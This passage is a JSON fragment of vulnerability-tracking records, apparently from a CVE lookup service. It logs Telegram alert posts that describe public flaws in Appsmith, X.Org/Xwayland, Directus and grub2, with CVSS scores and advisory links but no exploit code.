"415c83a2-916e-4c3a-b449-1146f30be8eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6MC8-HW5C-7QQR", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8963", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-55963\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: An issue was discovered in Appsmith before 1.51. A user on Appsmith that doesn't have admin permissions can trigger the restart API on Appsmith, causing a server restart. This is still within the Appsmith container, and the impact is limited to Appsmith's own server only, but there is a denial of service because it can be continually restarted. This is due to incorrect access control checks, which should check for super user permissions on the incoming request.\n\ud83d\udccf Published: 2025-03-26T00:00:00.000Z\n\ud83d\udccf Modified: 2025-03-26T20:09:16.461Z\n\ud83d\udd17 References:\n1. https://github.com/appsmithorg/appsmith/security/advisories/GHSA-6mc8-hw5c-7qqr", "creation_timestamp": "2025-03-26T20:25:52.000000Z"}, {"uuid": "90352907-0ec2-4384-af93-bc0fa22b66f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M95X-4W54-GC83", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8967", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-55964\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: An issue was discovered in Appsmith before 1.52. An incorrectly configured PostgreSQL instance in the Appsmith image leads to remote command execution inside the Appsmith Docker container. The attacker must be able to access Appsmith, login to it, create a datasource, create a query against that datasource, and execute that query.\n\ud83d\udccf Published: 2025-03-26T00:00:00.000Z\n\ud83d\udccf Modified: 2025-03-26T20:07:25.669Z\n\ud83d\udd17 References:\n1. https://github.com/appsmithorg/appsmith/security/advisories/GHSA-m95x-4w54-gc83", "creation_timestamp": "2025-03-26T20:25:59.000000Z"}, {"uuid": "cbc94a38-43ea-4e68-bf41-18514026ed62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2500", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9007", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26600\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. When a device is removed while still frozen, the events queued for that device remain while the device is freed. Replaying the events will cause a use-after-free.\n\ud83d\udccf Published: 2025-02-25T15:55:20.421Z\n\ud83d\udccf Modified: 2025-03-27T04:21:52.306Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26600\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345252", "creation_timestamp": "2025-03-27T04:25:50.000000Z"}, {"uuid": "66cd69df-2bc1-45b6-8047-548f3fc0fed2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2875", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9007", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26600\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. When a device is removed while still frozen, the events queued for that device remain while the device is freed. Replaying the events will cause a use-after-free.\n\ud83d\udccf Published: 2025-02-25T15:55:20.421Z\n\ud83d\udccf Modified: 2025-03-27T04:21:52.306Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26600\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345252", "creation_timestamp": "2025-03-27T04:25:50.000000Z"}, {"uuid": "e01db7a0-b008-4f6a-8976-781e3b8be2b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2861", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9007", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26600\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. When a device is removed while still frozen, the events queued for that device remain while the device is freed. Replaying the events will cause a use-after-free.\n\ud83d\udccf Published: 2025-02-25T15:55:20.421Z\n\ud83d\udccf Modified: 2025-03-27T04:21:52.306Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26600\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345252", "creation_timestamp": "2025-03-27T04:25:50.000000Z"}, {"uuid": "d8c7397f-25b1-4686-9ab3-8307d3fdca00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2874", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9009", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26598\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An out-of-bounds write flaw was found in X.Org and Xwayland. The function GetBarrierDevice() searches for the pointer device based on its device ID and returns the matching value, or supposedly NULL, if no match was found. However, the code will return the last element of the list if no matching device ID is found, which can lead to out-of-bounds memory access.\n\ud83d\udccf Published: 2025-02-25T15:54:57.355Z\n\ud83d\udccf Modified: 2025-03-27T04:20:45.713Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26598\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345254", "creation_timestamp": "2025-03-27T04:25:52.000000Z"}, {"uuid": "540f31bf-9fbe-4335-ab8f-766ba514f04a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2502", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9009", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26598\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An out-of-bounds write flaw was found in X.Org and Xwayland. The function GetBarrierDevice() searches for the pointer device based on its device ID and returns the matching value, or supposedly NULL, if no match was found. However, the code will return the last element of the list if no matching device ID is found, which can lead to out-of-bounds memory access.\n\ud83d\udccf Published: 2025-02-25T15:54:57.355Z\n\ud83d\udccf Modified: 2025-03-27T04:20:45.713Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26598\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345254", "creation_timestamp": "2025-03-27T04:25:52.000000Z"}, {"uuid": "24c9d39c-8487-4b25-8462-168629251b40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2500", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9009", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26598\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An out-of-bounds write flaw was found in X.Org and Xwayland. The function GetBarrierDevice() searches for the pointer device based on its device ID and returns the matching value, or supposedly NULL, if no match was found. However, the code will return the last element of the list if no matching device ID is found, which can lead to out-of-bounds memory access.\n\ud83d\udccf Published: 2025-02-25T15:54:57.355Z\n\ud83d\udccf Modified: 2025-03-27T04:20:45.713Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26598\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345254", "creation_timestamp": "2025-03-27T04:25:52.000000Z"}, {"uuid": "c60369ec-1c08-43f0-91b7-0b9d7ae88270", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2865", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9006", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26601\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. When changing an alarm, the values of the change mask are evaluated one after the other, changing the trigger values as requested, and eventually, SyncInitTrigger() is called. If one of the changes triggers an error, the function will return early, not adding the new sync object, possibly causing a use-after-free when the alarm eventually triggers.\n\ud83d\udccf Published: 2025-02-25T15:55:36.775Z\n\ud83d\udccf Modified: 2025-03-27T04:22:08.108Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26601\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345251", "creation_timestamp": "2025-03-27T04:25:50.000000Z"}, {"uuid": "536241eb-6ab1-4e22-9283-a8711b24ab1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2866", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9006", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26601\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. When changing an alarm, the values of the change mask are evaluated one after the other, changing the trigger values as requested, and eventually, SyncInitTrigger() is called. If one of the changes triggers an error, the function will return early, not adding the new sync object, possibly causing a use-after-free when the alarm eventually triggers.\n\ud83d\udccf Published: 2025-02-25T15:55:36.775Z\n\ud83d\udccf Modified: 2025-03-27T04:22:08.108Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26601\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345251", "creation_timestamp": "2025-03-27T04:25:50.000000Z"}, {"uuid": "a112abc3-8023-49cd-9649-02192b923ca8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2880", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9006", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26601\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. When changing an alarm, the values of the change mask are evaluated one after the other, changing the trigger values as requested, and eventually, SyncInitTrigger() is called. If one of the changes triggers an error, the function will return early, not adding the new sync object, possibly causing a use-after-free when the alarm eventually triggers.\n\ud83d\udccf Published: 2025-02-25T15:55:36.775Z\n\ud83d\udccf Modified: 2025-03-27T04:22:08.108Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26601\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345251", "creation_timestamp": "2025-03-27T04:25:50.000000Z"}, {"uuid": "82d0a431-d87f-4318-ade2-52b14e92ff69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J8XJ-7JFF-46MX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8907", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30225\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: Directus is a real-time API and App dashboard for managing SQL database content. The `@directus/storage-driver-s3` package starting in version 9.22.0 and prior to version 12.0.1, corresponding to Directus starting in version 9.22.0 and prior to 11.5.0, is vulnerable to asset unavailability after a burst of malformed transformations. When making many malformed transformation requests at once, at some point, all assets are served as 403. This causes denial of assets for all policies of Directus, including Admin and Public. Version 12.0.1 of the `@directus/storage-driver-s3` package, corresponding to version 11.5.0 of Directus, fixes the issue.\n\ud83d\udccf Published: 2025-03-26T16:27:14.665Z\n\ud83d\udccf Modified: 2025-03-26T16:27:14.665Z\n\ud83d\udd17 References:\n1. https://github.com/directus/directus/security/advisories/GHSA-j8xj-7jff-46mx", "creation_timestamp": "2025-03-26T17:25:35.000000Z"}, {"uuid": "ad0d061c-ee87-4073-8e82-4ee9145ca1dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2880", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9012", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26595\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A buffer overflow flaw was found in X.Org and Xwayland. The code in XkbVModMaskText() allocates a fixed-sized buffer on the stack and copies the names of the virtual modifiers to that buffer. The code fails to check the bounds of the buffer and would copy the data regardless of the size.\n\ud83d\udccf Published: 2025-02-25T15:54:06.708Z\n\ud83d\udccf Modified: 2025-03-27T04:19:56.000Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26595\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345257", "creation_timestamp": "2025-03-27T04:25:58.000000Z"}, {"uuid": "0bde73b1-8040-4016-bfaa-e3a55acabc98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2873", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9012", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26595\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A buffer overflow flaw was found in X.Org and Xwayland. The code in XkbVModMaskText() allocates a fixed-sized buffer on the stack and copies the names of the virtual modifiers to that buffer. The code fails to check the bounds of the buffer and would copy the data regardless of the size.\n\ud83d\udccf Published: 2025-02-25T15:54:06.708Z\n\ud83d\udccf Modified: 2025-03-27T04:19:56.000Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26595\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345257", "creation_timestamp": "2025-03-27T04:25:58.000000Z"}, {"uuid": "e803467d-9030-431f-9107-e3675fc35fa3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:3367", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9234", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0624\n\ud83d\udd25 CVSS Score: 7.6 (cvssV3_1, Vector: CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in grub2. During the network boot process, when trying to search for the configuration file, grub copies data from a user controlled environment variable into an internal buffer using the grub_strcpy() function. During this step, it fails to consider the environment variable length when allocating the internal buffer, resulting in an out-of-bounds write. If correctly exploited, this issue may result in remote code execution through the same network segment grub is searching for the boot information, which can be used to by-pass secure boot protections.\n\ud83d\udccf Published: 2025-02-19T18:23:21.463Z\n\ud83d\udccf Modified: 2025-03-27T22:08:46.706Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2521\n2. https://access.redhat.com/errata/RHSA-2025:2653\n3. https://access.redhat.com/errata/RHSA-2025:2655\n4. https://access.redhat.com/errata/RHSA-2025:2675\n5. https://access.redhat.com/errata/RHSA-2025:2784\n6. https://access.redhat.com/errata/RHSA-2025:2799\n7. https://access.redhat.com/errata/RHSA-2025:2867\n8. https://access.redhat.com/errata/RHSA-2025:2869\n9. https://access.redhat.com/errata/RHSA-2025:3367\n10. https://access.redhat.com/security/cve/CVE-2025-0624\n11. https://bugzilla.redhat.com/show_bug.cgi?id=2346112", "creation_timestamp": "2025-03-27T22:36:42.000000Z"}, {"uuid": "288b330f-36e1-4f46-81d7-a401c41cc5b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2867", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9234", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0624\n\ud83d\udd25 CVSS Score: 7.6 (cvssV3_1, Vector: CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in grub2. During the network boot process, when trying to search for the configuration file, grub copies data from a user controlled environment variable into an internal buffer using the grub_strcpy() function. During this step, it fails to consider the environment variable length when allocating the internal buffer, resulting in an out-of-bounds write. If correctly exploited, this issue may result in remote code execution through the same network segment grub is searching for the boot information, which can be used to by-pass secure boot protections.\n\ud83d\udccf Published: 2025-02-19T18:23:21.463Z\n\ud83d\udccf Modified: 2025-03-27T22:08:46.706Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2521\n2. https://access.redhat.com/errata/RHSA-2025:2653\n3. https://access.redhat.com/errata/RHSA-2025:2655\n4. https://access.redhat.com/errata/RHSA-2025:2675\n5. https://access.redhat.com/errata/RHSA-2025:2784\n6. https://access.redhat.com/errata/RHSA-2025:2799\n7. https://access.redhat.com/errata/RHSA-2025:2867\n8. https://access.redhat.com/errata/RHSA-2025:2869\n9. https://access.redhat.com/errata/RHSA-2025:3367\n10. https://access.redhat.com/security/cve/CVE-2025-0624\n11. https://bugzilla.redhat.com/show_bug.cgi?id=2346112", "creation_timestamp": "2025-03-27T22:36:42.000000Z"}, {"uuid": "945f5286-b7cd-493a-a1b8-346ef553047c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2675", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9234", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0624\n\ud83d\udd25 CVSS Score: 7.6 (cvssV3_1, Vector: CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in grub2. During the network boot process, when trying to search for the configuration file, grub copies data from a user controlled environment variable into an internal buffer using the grub_strcpy() function. During this step, it fails to consider the environment variable length when allocating the internal buffer, resulting in an out-of-bounds write. If correctly exploited, this issue may result in remote code execution through the same network segment grub is searching for the boot information, which can be used to by-pass secure boot protections.\n\ud83d\udccf Published: 2025-02-19T18:23:21.463Z\n\ud83d\udccf Modified: 2025-03-27T22:08:46.706Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2521\n2. https://access.redhat.com/errata/RHSA-2025:2653\n3. https://access.redhat.com/errata/RHSA-2025:2655\n4. https://access.redhat.com/errata/RHSA-2025:2675\n5. https://access.redhat.com/errata/RHSA-2025:2784\n6. https://access.redhat.com/errata/RHSA-2025:2799\n7. https://access.redhat.com/errata/RHSA-2025:2867\n8. https://access.redhat.com/errata/RHSA-2025:2869\n9. https://access.redhat.com/errata/RHSA-2025:3367\n10. https://access.redhat.com/security/cve/CVE-2025-0624\n11. https://bugzilla.redhat.com/show_bug.cgi?id=2346112", "creation_timestamp": "2025-03-27T22:36:42.000000Z"}, {"uuid": "3925a2d1-6e17-47a3-a233-d218e2a6d5d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2865", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9013", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26594\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. The root cursor is referenced in the X server as a global variable. If a client frees the root cursor, the internal reference points to freed memory and causes a use-after-free.\n\ud83d\udccf Published: 2025-02-25T15:53:51.324Z\n\ud83d\udccf Modified: 2025-03-27T04:19:40.033Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. 